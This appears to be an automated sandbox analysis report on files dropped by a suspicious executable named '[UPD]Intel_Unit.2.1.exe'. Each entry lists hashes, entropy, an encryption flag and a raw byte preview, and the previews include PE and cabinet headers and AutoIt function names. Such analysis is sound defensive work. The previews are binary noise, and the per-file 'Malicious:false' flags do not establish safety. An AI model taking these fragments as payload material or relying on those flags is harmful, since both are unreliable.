                                                                                                                                                                                                            Preview:a.....t..m.+...G..L..-.L..G{H.)...g....c...6U'/.k.....mx....~....#{.\...fb....fj6_%..VTu.......W.E.3Q...v.7|m...{u*..R_......'..K...m-~..aG&.....:.nUUg-..;.P.U...u....!.._-~.GG2.u.]..^.[...96J.+...M..v..G.K...].0...'.Bv..T....|......"r......6R.9?...I...E..g........2D`.'.c......:.]........D....#Y.Y.....^~k..U..Z.\W....a.+S..OF....J.tv....M...h.'...h.,.!.|....:..gbN..'j....`RU'....9Xy...s|o7...j....[...:..j?........Sb<...h.8.>gj:.-v....L&g........]qG:.|...N...v...V..."_;uk..~..I.9.........31...E...G...d....8..\...$....F`<.$..o..4.]=.....E92U......M....x..G{......}..N3..+.g.mNI..k6...@U.P....1 .3..o.}{4..3t.[]M.....6......6].mM.g.....x|...u..5D..t...X........[.........u'.6m'..qx....)...VM..fXY.\......].F.RM9.n+./.....Bu.....I8.....j6~g.H.R..i.."."B*......XL.:......H.rk.|~......{.....-..6..~..F2...x.;..3..DmJ.8].q.-..m...M.P....M......F.n.VW.../....Dv.Q.T,.}=t.|.....?O..{......N...@.f...*...........Q:......G..7.r..b.r~.o.1~O]~?.. {....
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101376
                                                                                                                                                                                                            Entropy (8bit):7.998289793135337
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:3072:ZWaujKdQxdWGP9yav4uBGr6cUjzqcYx+K0D:ZVIldWi9yavtBGIjmcfVD
                                                                                                                                                                                                            MD5:74211A093ACE2419FDDABF68402441EB
                                                                                                                                                                                                            SHA1:9CD16D7918AA0FC4A735C55A8B8E5DCBB74EA4CC
                                                                                                                                                                                                            SHA-256:175E85A1F212BDDB8CC6ECB55BA5BB566CBE5BA08685929E0E56834D24ACF70F
                                                                                                                                                                                                            SHA-512:49C84398C911D63D20B6412B3587058544C6D22684C3E2A1D18896FC897756285F1EAB24A9C0F6AEA34932FE8F28562D97C18D7F30821A380A190AA23FBDCDB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.\.Uv..E>..3k..R..1S.\....i.._`..A........?n....E..^66....W1.Z.....-F...%.._..y.gsl-..M.7....O.....Lc...?...{.aA..d*...4V.Z36...-..5k,.......H.t....\. ..7......E..7.oh../6p..wo..(.\.:.._....T....{...e@.j....sY.(....a..9(E...b..."2.&.KRwYiE...j.$r.VNv.w..g..7....xI.C.@..,...o...0{.N..d....R..5I{.-.P.....X..w.\A.e...7d2z6oxO.07q]\.(u(.1u..G.`..k.j,...'."..We...d.g....=....V7..]?.....(.SR....Uox...~.3..*RT.r..g.>..-m.RjB.....M..q5.2.2|-..e..k.k|.{..^........P'...1.G.7...F.u43%L..#..}..... .Y..w.63...-:...&|...!.{&,hUh]`/TRl.16\Mp......}..^.En._.|i..B;...Dw.Xt...V...\....2.....v.#E......w.exOhUXB..-..GA+.Q`.$.J.^]...J....OH...i..r..(.T..}v.N....|...E.....3...)H.....+........V{..1/.zl....d.o.CL..qh...1..xTv:..R\H...y..... ..7]R.NX..zu....b.q..OP........wT.,un*1!....o.p.ZWua~...%..:q.Nb_...;.S.C...X.$7...r.cE.CT..;...}..#.5:...%.. H.G4...};.MN..q.....F...+..n..v.jE..(i.1....;P....=.6J=i...#@.....jX.H...Ry..... ;bxv..q.yW..>Z.'MzItP]</
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, 489168 bytes, 9 files, at 0x2c +A "Sanyo" +A "Kelly", ID 4635, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):489168
                                                                                                                                                                                                            Entropy (8bit):7.998376917210363
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:nWIqkek5RNSv9jc3jd/k7oMCUynWbw7kc:Ckek5PSv9egoMTwoc
                                                                                                                                                                                                            MD5:2028CDB5D355AE0AE129EDE2856E6AF7
                                                                                                                                                                                                            SHA1:3A516E498A9C03E71DB0EEB7F0AE1C2E121D97D8
                                                                                                                                                                                                            SHA-256:D1CD829A22A96B6EF923B099EDD0A70148E0DF7952BCE709DFEABDB0821481CB
                                                                                                                                                                                                            SHA-512:292CC1BE4D47FC76B88404AE1E7A801E0EC352766AE3803E711F3082A777BC97933AB2C17AB5852EC6B582BBF6F4BF3F7DFFD82AA000FF30C2FCBCB638C7AA70
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MSCF.....v......,............................<........%Z.. .Sanyo......<....%Z.. .Kelly..$...>....%Z.. .Pg......b....%Z.. .Hence..d.._`....%Z.. .Lifetime....._.....%Z.. .Robert....._P....%Z.. .Folk....._0....%Z.. .Enlarge..H.._,....%Z.. .Ware..i...?..CK.}{|.....%.&Y.....(`.A.,j..Ev.eqc..0.VIq...$.kB`...qz..jk.U.jm......nBs..%X.Bk...:Q....!.{.3..D.K.?~...|6;s.s.y.s...9gVVL.em...]V.u...l.Y.Me#.t.a..V...[.+....]........JB..,~"...@/.V....U.APm....y..vO..8......./(ip..w)&.S...d.._.K.Pr...M...6o#7#....9&..B..$.U~...@s..&.*.\....a.....E.t......Bp..p?...G>.T..e;.V/$.Aa....8..|..._. .3+..w........1........Y+...Y....GA.......cgTu....@.|.a:.....j3....U.>.f.^..........dL2........)g.3GU..z...&.9....j....gB..%.Lh...K\.>c...rG..Bx^..r.ms.4 7u3..()........T..u..em.*o.<}.Al.j..y.. E..m..Y..K...f......9e...Ja.R.....W..:(p..a....uV.I.p.L..}.>.Z..gq.c.G..S..`......R..Ne[..9;t.$.....w.&.....HA..@~)f..H2.!1.#..P..$..:I.a,.f......q$..z....<1....5.Z"$..kA.2ZK.Nr..Z #t5%..$
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):733
                                                                                                                                                                                                            Entropy (8bit):4.126270010139073
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:pyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1+:pyGS9PvCA433C+sCNC1+
                                                                                                                                                                                                            MD5:7A8CE9A909CE0C4C0F9D5A47F16DAB6B
                                                                                                                                                                                                            SHA1:D04BBA85758B2C21A742305D73625E5B35EAFB61
                                                                                                                                                                                                            SHA-256:3C0DCA2776C4FF962652481FDC54C593E38C0AF50016626A7991BF68003563C0
                                                                                                                                                                                                            SHA-512:5B636AB0D20417867113ADA0DD1EF95BD1ABD542E05334BD729D290F090B3D3EB07D1D2B54F8875CD0D0435BAD45BF152E8C2C7A10CD331E61C078D917E0BABB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Backing........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):91136
                                                                                                                                                                                                            Entropy (8bit):6.398448586512035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:8LueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfy:cueoMmOqDoioO5bLezW9FfTut/Dde6uJ
                                                                                                                                                                                                            MD5:D2CDA7CBDD60AF9772657B615B472B06
                                                                                                                                                                                                            SHA1:C8B89329D2DFAB08171C51E446E9156D4E8652D6
                                                                                                                                                                                                            SHA-256:377142412A126E3ED09F750DB4970A696BA3F5A5E042A17FE34E82754C5D145C
                                                                                                                                                                                                            SHA-512:152FAA9BECD1DE39C1DBD6B074D713B16CB174CBDA1124AF9E4D2AA7950FF7AC58063AB1E916B19988F8EEE2C7602E4E3B4009F2A03ECBF2BCECE604BA52C53F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....{..t..s......Y_^[.....f.H.f.H.\.H.a.H.'.H.A.H...H...H...H.k.H...H.'.H.'.H...H...H...H.U..E....SVW.}.3..X..~+...w..7....I.j.j.j.j.j.h..L.................;w........M...'...G..M.+.HP.F.PW.%...j.V...O....DpL.V.#...Y.M.;.u;..t..E.+...>...0.}.f;.}.u.......u...u.@....f;U......@...L.V....Y.M.;.u-..t#.E.+...>...0.}.f;.}.............u...tH...L.V...Y.M.;.........t#.E.+.E....0...f;........E.......u...........M..A..M...%...M..A........E.G..E..G..E.G..E....A.P.E.P......uA.G..PpL.V.E......Y.M.;.u*..t...+....0..>f;.uM......u...u..M..Y....M..$...._^[....f;U......@..........@.F....M..c$..2........@.U...,.E.SVW.@....p....d....V.3.u..]....E.B..E.B..E..B..E....F.....E..x..u..+....M..A..0....I....E...:../....~/.F.........../..;....E..@..../.........D...0.....u....H..D9.8\9.t..@8.@...........E..@..H..y..u,.M...'...U.M.._...u.V....I..M....M..X#.....F/..PV....I..M....E.9........E..@..@..x..u;jA.M.......M..v'...U.M..I_...u.V....I..M....M..."...E.9.u78].t.V....I....H..D9.
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36456
                                                                                                                                                                                                            Entropy (8bit):7.995216907218738
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:768:J4iIW3815tD3yWEQPK5PbaX4cHO3E6k6pVvJL2YFOletE8RFcx2d+mIcRCP5:J4C38hD3yW7eeX24y/FNtE8RFcx2eHP5
                                                                                                                                                                                                            MD5:275BB06E411E18B2F2413C99F90B273C
                                                                                                                                                                                                            SHA1:B0B56521A5DF919287999A6367C9E9DB452E15DA
                                                                                                                                                                                                            SHA-256:FCCAE85D1B45A4A6F6A9BCB369FA7C8A012DC2FCC3E6AD2D93BDDDFF527EBB6F
                                                                                                                                                                                                            SHA-512:89936CDDE69A00F5501DB3CCDA1C1A80933E5B36FA60A103BF33C9F6AEEB8D0CE5EF329BE445898AB2C5C7C0863909B855B5F913F07D9EB838B8BA71C87B3E71
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...<cM.0....P.6...A..d.X./.G|}...N.>....._.3...[..q.1..2+5.+.j1K..&+...6.c.x<.t..mZ'..((#.GX.......5........m....O....O....{.-k...aj.h/..AuH.g...*N.....E....7..+......o....*H.....X..z2.F.R..........LZO....~i..;....fR................Z.@<d..^...Q..[...R...I4..!X..?..Sz.kTv7..b......ag.d..&.K.{.....7W......h.L..8....j'p...J..#..R...!.....\.J....-<f..$.s.......=.(...J..)..b.~.N'.\Z2$.S~oO.b.-..P1.....C.a.A./.........@.z..^.aX7~u%...C,+...pW.~...#eX9]..`F..n.k..4.69.d..akZO...9~g.s..v(..\t..M...Gg....@f..H.+W...>g#8.......:.^...k#....U..W.....R!.....c[.D.}..:.\.......{$C.....3....h...52By..k.a...:.."..xBT,....q6...VLU...T.#........z.3.[..........^0.4.Y...?.q.1LaZ.8..];...m.....".RP9.ch<o....KJP.ez...K0......gi..I..v.. .....V+.7:k^...[.._/..Va....7..<.....Uk ...Ex....C..+q~.K.G/~...3N$.R,T..ypdN$..In...i.q..Z...G..?..S.qC...!......3Y.o.........R'.d.B...M_.B.....I.pNc.LD.@.y....)...M...(.^p."......`p..9Ot=5.r......_.....I...z...DLw..
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):140288
                                                                                                                                                                                                            Entropy (8bit):6.67958710669291
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:KCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmt:KCOMVIPPL/sZ7HS3zcNPj0nEo30
                                                                                                                                                                                                            MD5:2B437132A55BFA02A968B7176F510E8A
                                                                                                                                                                                                            SHA1:8FD9C04CBFD4B66DADD61A4095FB488D3672F76E
                                                                                                                                                                                                            SHA-256:B31778D643869E67EEFB497906F92BD0605EC0CA0EA0B658D5DFAF99445AD506
                                                                                                                                                                                                            SHA-512:4B9DC69684AFB7F49A5F300692763E8164798E3BED7E14329CE36EFBB65642A00EA83CD2CC26606A472A6B5DA265CA5273FFE8FF7C06C842229503AA1935C476
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........L..........y.I..A.....E.,K.......K.... cL....t.....E.tz3.;F|.......~X............_..........y............L..........y.I..A.....E.,K.......K.... cL....................H.......E...........f;...q....FD.....E...a.........Y................;............Fh..................j..........f;...z.....FD......k.........c...;........Q....V..N|..t%.E..}.;.sSW.F.PQ.M.............d....5.V....+.E.;.w#f..f;F4u......A....E.f.@.f;F6..0....}.E........t=.F|.M....;.u-.~..u'.~..u!f..f;F4u..Fh...........~...i...}.E..N|;...=T......E.........;.......f.......f#......f;........E.......E.;F|...S.........E..]..D....E.;F|...S.........}....E.t0..%....=....u".E.............%............E...........5....FD...........#....E.;F|..qS.........}....E.t0..%....=....u".E.............%............E................FD...............E.;F|...S.........}....E.t0..%....=....u".E.............%............E..........._....FD......H....M....E.;F|...R.........}....E.t0..%....=....u".E.............%............
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101376
                                                                                                                                                                                                            Entropy (8bit):5.831454437971605
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Fh6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPG:Lq8QLeAg0Fuz08XvBNbjaAtsPG
                                                                                                                                                                                                            MD5:5E91D4FD817D0861A7A01118369251C4
                                                                                                                                                                                                            SHA1:48C4A668B72C583F8A98E98485135E04CB63BD35
                                                                                                                                                                                                            SHA-256:C4397DEEFB0CFDDB5C71F93FA5D993B698C88D10C1AA9B550FACE439F09E6A0E
                                                                                                                                                                                                            SHA-512:80883D353DC41838AE9F054DDA5BD15604361802E3A1C7EF516356C689E3CC6248C47E0F04C1FF9F7DE9D3DC92FFE0B3E9739FADB3249599122C307CAB6B2C90
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:E.N...I.N.I.D.E.L.E.T.E...T.C.P.A.C.C.E.P.T...H.O.T.K.E.Y.S.E.T...T.I.M.E.R.I.N.I.T...S.P.L.A.S.H.O.F.F...W.I.N.F.L.A.S.H.....F.I.L.E.M.O.V.E.....I.S.S.T.R.I.N.G.....O.B.J.E.V.E.N.T.....D.L.L.C.L.O.S.E.....I.N.I.W.R.I.T.E.....I.S.B.I.N.A.R.Y.....B.I.T.S.H.I.F.T.....W.I.N.C.L.O.S.E.....R.E.G.W.R.I.T.E.....I.N.P.U.T.B.O.X.....I.S.N.U.M.B.E.R.....S.H.U.T.D.O.W.N.....F.U.N.C.N.A.M.E.....F.I.L.E.O.P.E.N.....F.I.L.E.C.O.P.Y.....I.N.E.T.R.E.A.D.....S.E.T.E.R.R.O.R.....F.I.L.E.R.E.A.D.....C.E.I.L.I.N.G...W.I.N.M.O.V.E...R.U.N.W.A.I.T...T.O.O.L.T.I.P...W.I.N.K.I.L.L...D.I.R.C.O.P.Y...U.D.P.O.P.E.N...U.D.P.S.E.N.D...R.E.G.R.E.A.D...I.N.I.R.E.A.D...I.S.A.R.R.A.Y...W.I.N.W.A.I.T...T.C.P.R.E.C.V...O.B.J.N.A.M.E...D.L.L.O.P.E.N...E.X.E.C.U.T.E...I.S.F.L.O.A.T...D.L.L.C.A.L.L...U.D.P.R.E.C.V...W.I.N.L.I.S.T...I.S.A.D.M.I.N...C.L.I.P.G.E.T...I.N.E.T.G.E.T...U.D.P.B.I.N.D...D.I.R.M.O.V.E...C.L.I.P.P.U.T...S.R.A.N.D.O.M...M.O.U.S.E.U.P...M.A.P.K.E.Y.S...T.C.P.S.E.N.D...T.R.A.Y.T.I.P...R.A.N.D.O.M.....C.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146432
                                                                                                                                                                                                            Entropy (8bit):6.700973790130753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gcBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80Pi:gcB3gBmmLsiS+SAhClbfP
                                                                                                                                                                                                            MD5:81A88E12D802C5BC732E0CFEA18F022F
                                                                                                                                                                                                            SHA1:3B1671DF94E6C36429DB33CC5D127F2DA509A43B
                                                                                                                                                                                                            SHA-256:8ED1351B297F6AE561D8CBCB860470BF4CDA8E9C77CBBAE1DD9EC2B5151AE86B
                                                                                                                                                                                                            SHA-512:CE507ECDE5BA3BD54C9B1FC87C78FD0F876DF74B5045E73C420A883638301270511DBCA8135933EEDE367636ABBEFB9845CA54EA78BDCED75C57C0F0F3AEBDFC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....E...@.E..E.P...j.P.]...........u.8E.....E...-u.....E.....+u..u...F.]..u....u...t....ux..,0<.w.......#..,a<.w..........,A<.w.............t...u=j._.8..F.E..u.<xt.<Xt...u.j._.u..M.......u.....u.j._..F.]..u.3......U.U..E..K...w.......#..,a<.w..........,A<.w..............t0;.s,.E....].;.r.u.;M.v............E..F.]..u...u..M..U..G....]....u..E.3.E..A.u.VS....YY..t(......."......u.........t..................t....}..^.. ....E..P...........U.....M.SW.......t#.E.j._..t/;.|...$~&.............3.U...t..M..._..[..].V.u..M.......E.3..u..E....E...0..j.V.E..L...YY..u.3.8]....f..-u.....f..+u..}...7....}....}..M..E.....j0Xj.Z..t.;.......f;...U...j:Xf;.s.....0.=........f;........`...f;...&......f;.s....-`.............f;..........f;.s....-..........f...f;..........f;.s....-f.............f;..........f;.s....-.........f...f;..........f;.s....-f............f;...w......f;.s....-.....]....f...f;...T......f;.s....-f....:....f...f;...1......f;.s....-f.............f;..........f;.s....-.
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):74752
                                                                                                                                                                                                            Entropy (8bit):7.997637591269226
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:1536:ipnvhkt/rkMrRhuVfHYTGTMKJUpzRsYUlJSZR9L/I2Zty4ECd5Hsu8eFEjfS:ipn2kwuVgTycXUlEZTXy4b84FEDS
                                                                                                                                                                                                            MD5:779EBB32A40C9A64396EACD3CBDD721C
                                                                                                                                                                                                            SHA1:DEB9EBDC964BC43CE160EDF0E3808A18E3CC89ED
                                                                                                                                                                                                            SHA-256:BBC2D48F751A6FCBE3A19470BE69D77DA346F4C87E38A0421FD4CE941CA592DE
                                                                                                                                                                                                            SHA-512:68EB848D8A2DBE411062B2B99A2896BFD67F4915C3E38DFF2D2B62CCF9E41FA15906D3170DF586AEC52FAEE4C81E1D6537FC95EC961CF4A7BECFF43C7D59FF01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.....2.M.>.k.Y.%...S..f:.|.../)^.l.,..eu..d.L..}.Q....H..[(<Ff.Ar...u..l.J.sn.....~...$.~..=9.....V..K....PH\?.d..`.13......:.o....y...._.2.>.^..a>...PA.T.x...g....*...e....].3..&.:4.P7.E.S..jt...n..4...}T&.....cS.r.......iyZ.G@'.n.....h....U..d.(z..I......=[...VF.....Q[.....4...s$.......\\1~.YY.;.iSB...6s....C..14.........8.oa...C.1,b..K...T....'%.y._Qy...........Kp.....v....H<u...J.'.#..S..DdGK.!S...K..d.6\.Yr..............[.mU8&....o......k...WK.D5.A.B..F..t3....W...4.{..,.....O..S..,..".........'*.......bZ..$Q.TjIc.`.....I#.Q.O(..-9.L..WHn..t.Q.0.W=.o..r.........#k.a.M#.ITx..=..!^...C....H.?.........%..3....@....]..p.Jy.....T.FR...,.Bw.Y...W.$q0....I..G.G..:.....A~.....K...|..Le.NZ.....t..~....`0.Fk..2.AwiR.$....G@.@.. ..?......r....Y(0.m.......z.....K....B.yQj.3..d....+(x$Ki=:.tM......~5C{..V.........m.].........0~g!.o.f.p."...E....#..s..R..$@....vg}S.>`.....P...DF&.8.....A.Tq'..C.H.+p..y......k....~...c.L. .Q.QT.not...PX....^q6W.s,~..kK
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):77824
                                                                                                                                                                                                            Entropy (8bit):7.997870250617184
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:1536:TtJo1vMTZggzPic9/l7vS4IozlbdXICpARnuIt0syQnp4EB:rUMTugzPTD75D7X7mnuIaPi4EB
                                                                                                                                                                                                            MD5:7BB1C7168444847E64B8D52A19D526A4
                                                                                                                                                                                                            SHA1:B0577E3414D38F3A036895E78D0A8BEB186622DD
                                                                                                                                                                                                            SHA-256:8259D660879A9A28012B0D7F4D1A360B8BCFBBCC01CBCD308E04455C5E2766D7
                                                                                                                                                                                                            SHA-512:70A54AB94335AECF6C6F77A9C2ABF8E27131D43D981EC6656B4A5522444A1EF548C968002E3B663C6799E180F07142D4C8DBB33D35427FFD3307839F05234045
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:|@q...Pew...."|f.....E..XD..N.N....kN.R.M=z.5...Ng..b.....<.8.k...m.~.\.Y{...F.f/"...8....|.......#.....*.'U..ES.-.Ra MW.1.5N4...P..0.m...\..%7....@l.~.+.`.P..&..#..>.R..O2&,...[Rr.z$..C`.[.-..1.....&*)....P<..6.h.X.@....n..g..H..-R.1..>.m..-p.....ba#..#.F..y|....2..Z\G.....F...c........^..$.....$..Ry............g.7J=o.$?.........]..a.!O..>.l...*..>......9a..#T....o.r5T..#...../....`-..X).0..h.a`.g.[ F.R..>....:.!./.E.r>uA...5..v.5{>.H.9.g.....*..".Z$..[5_...o_q...=...Cqb"/.?..(Y....,B.3.4..!m.....nG.k.+..5[=.t.1..Pi...D.{....y......L...Z.).`I....N.f`~.!......'X.bT...*.....e.B'.t...u}r...^..3..L,/....)y.Kj...(. a....r........N.n.g.....;..X...#.....e......w....}W...G....;.m.EFp..t.....x.P. .r./i..d......M"....6+q[8.X...R^'....)..<.{....rp.9@b.qS'kId.K..lI...f.H.....;....5..a`B@..6...E...u.i.sN........$Kl~b.r...p...$....`[..-q....|....*...M...w.T...\.N.H..it......<..B.{....?..WMl$....F...X...Q...f..59....H........`..}%e.3.g.{.N
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):57344
                                                                                                                                                                                                            Entropy (8bit):7.996513432203169
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:1536:LfGuf2wH08DxVkEPQkFUZi+JpJR8gfRzTVvr6avC:lf29uQ0+iIJugft5DrC
                                                                                                                                                                                                            MD5:0DD5041D2A616872A113D55B19C45A1E
                                                                                                                                                                                                            SHA1:B60405E4CDDF57920B0EF1929AC47043A1101C2A
                                                                                                                                                                                                            SHA-256:2257296BA16A378E02D68D82FF9BD280F3AD173E013248D9369CE08F4F900094
                                                                                                                                                                                                            SHA-512:A8A3F2EE5140103BC7E49C3D1ABC838C921CEC0616FE13E199DBBD807F73BB839067FB11901D37B5C7EDBD2464E94F4BADA81B036BEA3357979DD7AABBAE13DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:H[.R....(..0......A&..HA.Io.G..#....:...E....}...M..#v..}...[..u.v...I&l...i...2.....5....>9..b8....;.3.9.."y5.=..B,.......M+.d..t.0.HL....}.-.>.5....L.-.\..z.%GR.7m3..Su"..-...3......,F...xi.4.a...L..`.`M#]j.).=T.X.....H......~.2.'...%3Vd........}.......z!z.Mx.......K.U)W6.....G....._..<...Jr... ......k ..._...7...d.5.[<G.lD..i. )...$.2;.~*I.J."..q..:.ti#..}x.._.2/...kC.M..T.....Z...=Kvn.lN..Rn.U...p.hr8.......$K.K.r.%Y...8.5.66.....gT....-.m.c3...dm>.^.H..Pc..x.zM.f(6..\i.n.$.w.~@....;..T.O...Bl.....s.Y....Sk...F`e...j.U..|..`.w...O9....e=!/V......[.g..l...S...{3~..@?....{.8.8....t.7._..+s7......E..T.>A..b&N.fq.F.....5..K.P.2......B.....,....<..;..R.H.H5K..gi..0......zh.B[...l=.'8IMS<d9..G...I.+M..S@....P..h..Tq..d....7Q..9p....PZ....o....z`....?.3.&.h..Y....^{f..%4.eg.3]5u.Y.A...l...6h........O.1......"..UuKHf..s...c5.k..XI[.2.....(.....T.!E!.X#...>....S....L._A...h&.#B"V[s...,.....<E..5.i....jA.q.Y...... ..l.U2.`1..%.._.C|..i..y..*9...
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72704
                                                                                                                                                                                                            Entropy (8bit):7.997145120935144
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:1536:IupSQ5m5cgNG/V8cr5O6FE4VDC0FUvZVLzG:xSQ5m5jG/VRr06FE4xCtvZZC
                                                                                                                                                                                                            MD5:CAC74FA897B87E72256E7D176DE38B23
                                                                                                                                                                                                            SHA1:7EC04D342ADE1E868751C07C01BDFD93216BC87E
                                                                                                                                                                                                            SHA-256:6B6D3F0088A0BFCB9652FDF848AD15CB8E0303DE35DDF1F90517991EEC557571
                                                                                                                                                                                                            SHA-512:D1B7AEAEA71163C5922ED90F0ECAB266299F77BFDF0B4A73042123DF5565BAC425628FEDC552180A083872D74B5A1676423F10B8C90140EBE228F430557CBEFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:_.A]...c...S#.L..-....d$d..Swm..`L.s@d.^!.$..9....js......R....&8.Z.....<.d..BR..3k.v...h..4a..).....1#...|...ET]....n./5..$.Z..5x.7.0..Ax....iZ....?w}....L..y^}......1Yc.(...ql.........kI9...O..h{...*.&...1R..+rh.<.m........^;O.1..... ./.....+qMea...4.LIhpK.I'...}.\..4.FF.hzT.{.. ......R.T..@.!..C....."..b..'......HBE..^$...=.|...*..Do{...s.....=...u..u...!........%/..Y.,.@...S.R.....6..|.....W..H.......l.~...5d.J..:.9R..z..J....9...I..]O..a.T....a...K.M..........envn.y..)....B,.vN..&U..l)hE...(......$...eV]..Q.......Y..5.....m.w...a.^S..0.h..k...A..N.y.y...T.H.(N.....y*+L.n+rj..."...!=......^...[.... -R>.......3.............^.....a..<. .....h.H...6..,V....IM.A<.../.YbHK..Kb.,T...4...1%D....Ys>|.e...aj..N.Od...=..~O..........3.|{Y.tWE-R=O:...X.C5...5...\.*...W....B.\......@L.x?"q.9. ..?...(ie.8...$...b;...7c.....:..]6CA.g.yB-....W..j.df..%....L ..P.....t+.H.....V..2.1NU....L$..W6.q_'&Tvs..]......P3g~.....Y......%...eG....y.....{..7?.4S.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                            File Type:dBase III DBT, version number 0, next free block index 16896, 1st item "SVW\213}\010\203\310\377\203e\010"
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149504
                                                                                                                                                                                                            Entropy (8bit):6.43114886038352
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:AZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:AK5vPeDkjGgQaE/loUDtf0aD
                                                                                                                                                                                                            MD5:C7024F7EBC1135660D5A31BD4D90182D
                                                                                                                                                                                                            SHA1:79CC0BA360E6FCFA44B1D963B677A3B9F1520929
                                                                                                                                                                                                            SHA-256:68A96DF5C94374A988EA3D1222A7931EB24565FB78EA6832D5A6BDC993095EC9
                                                                                                                                                                                                            SHA-512:FCC61387E7DFD07D90E64978126C7CFBD573DCEDA02ACEFB8770D3033345E69928F6DB34C72E55547EC4A24547A8655487EEA93E912D2E59AAFD2AFFD5B74955
                                                                                                                                                                                                            Malicious:false
